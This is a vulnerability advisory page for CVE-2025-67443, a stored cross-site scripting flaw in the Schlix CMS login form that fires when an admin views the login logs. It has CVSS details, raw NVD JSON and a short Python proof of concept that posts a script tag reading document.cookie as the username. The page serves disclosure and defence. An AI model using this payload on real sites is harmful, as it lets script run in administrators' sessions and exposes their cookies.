Security Vulnerability Report
CVE-2025-67443 CVSS 6.1 MEDIUM

CVE-2025-67443

Published: 2025-12-22 17:16:00
Last Modified: 2026-01-02 16:56:20

Description

Schlix CMS before v2.2.9-5 is vulnerable to Cross Site Scripting (XSS). Because the login form does not sanitize JavaScript, failed login attempts that are written to the logs trigger XSS when those logs are viewed in the admin panel.

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:schlix:cms:*:*:*:*:*:*:*:* - VULNERABLE
Schlix CMS < v2.2.9-5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2025-67443 XSS PoC for Schlix CMS
# Target: Schlix CMS login form
# Vulnerability: Stored XSS via login form

target_url = "http://target-site.com/schlix-admin/"

# Malicious payload - XSS via login form
xss_payload = '<script>alert(document.cookie)</script>'

# Login attempt with XSS payload
login_data = {
    'username': xss_payload,
    'password': 'anypassword',
    'submit': 'Login'
}

try:
    response = requests.post(target_url, data=login_data, timeout=10)
    print(f"[*] XSS payload sent: {xss_payload}")
    print(f"[*] Response status: {response.status_code}")
    print("[*] PoC sent successfully. When admin views logs, XSS will execute.")
except requests.RequestException as e:
    print(f"[!] Error: {e}")

References

https://gist.github.com/akinerkisa/b22f4517a4011d049c5fc7fd3b29c9f2 (Third Party Advisory)
https://www.schlix.com/news/release/december-2025-errata-5-bug-fix-release.html#:~:text=Fixed%20XSS%20vulnerability%20bug%20when%20clicking%20New%20User%20%28thank%20you%20to%20Ak%C4%B1ner%20K%C4%B1sa%20who%20reported%20this%20security%20bug%20and%20provided%20reasonable%20time%20to%20fix%29 (Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-67443",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-22T17:15:59.913",
    "lastModified": "2026-01-02T16:56:19.760",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Schlix CMS before v2.2.9-5 is vulnerable to Cross Site Scripting (XSS). Due to lack of javascript sanitization in the login form, incorrect login attempts in logs are triggered as XSS in the admin panel."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:schlix:cms:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "2.2.9-5",
                "matchCriteriaId": "90243240-BE93-4144-ACBE-E4D5AB2B5396"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://gist.github.com/akinerkisa/b22f4517a4011d049c5fc7fd3b29c9f2",
        "source": "[email protected]",
        "tags": ["Third Party Advisory"]
      },
      {
        "url": "https://www.schlix.com/news/release/december-2025-errata-5-bug-fix-release.html#:~:text=Fixed%20XSS%20vulnerability%20bug%20when%20clicking%20New%20User%20%28thank%20you%20to%20Ak%C4%B1ner%20K%C4%B1sa%20who%20reported%20this%20security%20bug%20and%20provided%20reasonable%20time%20to%20fix%29",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}